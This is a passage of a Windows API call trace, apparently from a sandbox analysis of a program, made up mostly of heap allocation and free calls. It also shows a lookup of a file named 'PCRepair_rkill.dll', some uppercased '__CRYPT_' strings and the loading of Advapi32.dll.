Size=0x10) returned 0x2e53a58 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0201.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0201.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0201.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0201.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.049] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/PCRepair_rkill.dll", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4499b48, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4499b48, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48535dc, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1b81d0, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="PCRepair_rkill.dll", cAlternateFileName="PCREPA~1.DLL")) returned 0xa87490 [0201.049] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0201.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.051] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0201.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0201.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0201.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0201.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0201.052] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0201.052] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0201.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0201.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0201.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0201.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.053] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0201.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0201.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0201.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0201.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0201.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0201.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0201.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0201.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0201.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0201.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0201.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: 